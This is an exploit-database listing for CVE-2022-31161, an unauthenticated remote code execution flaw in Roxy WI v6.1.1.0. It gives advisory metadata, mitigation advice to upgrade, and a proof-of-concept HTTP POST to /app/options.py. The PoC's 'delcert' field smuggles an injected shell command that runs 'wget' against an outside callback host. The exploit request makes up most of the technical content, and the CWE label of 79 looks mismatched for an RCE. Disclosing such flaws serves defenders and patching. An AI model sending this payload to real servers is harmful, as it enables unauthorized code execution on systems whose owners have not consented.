header-logo
Suggest Exploit
vendor:
Roxy WI
by:
Nuri Çilengir
9.8
CVSS
CRITICAL
Unauthenticated Remote Code Execution (RCE)
79
CWE
Product Name: Roxy WI
Affected Version From: Roxy WI <= v6.1.1.0
Affected Version To: Roxy WI v6.1.1.0
Patch Exists: YES
Related CWE: CVE-2022-31161
CPE: a:roxy-wi:roxy-wi:6.1.1.0
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu 22.04
2022

Roxy WI v6.1.1.0 – Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload

The Roxy WI v6.1.1.0 application is vulnerable to unauthenticated remote code execution (RCE) via ssl_cert upload. An attacker can exploit this vulnerability by uploading a malicious ssl_cert file, which can lead to remote code execution.

Mitigation:

Update to the latest version of Roxy WI (v6.1.1.1 or higher) which includes a patch for this vulnerability. Additionally, restrict access to the Roxy WI application and regularly monitor for any suspicious activity.
Source

Exploit-DB raw data:

# ADVISORY INFORMATION
# Exploit Title: Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload
# Date of found: 21 July 2022
# Application: Roxy WI <= v6.1.1.0
# Author: Nuri Çilengir 
# Vendor Homepage: https://roxy-wi.org
# Software Link: https://github.com/hap-wi/roxy-wi.git
# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-31161


# PoC
POST /app/options.py HTTP/1.1
Host: 192.168.56.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 123
Origin: https://192.168.56.116
Referer: https://192.168.56.116/app/login.py
Connection: close

show_versions=1&token=&alert_consumer=notNull&serv=127.0.0.1&delcert=a%20&%20wget%20<id>.oastify.com;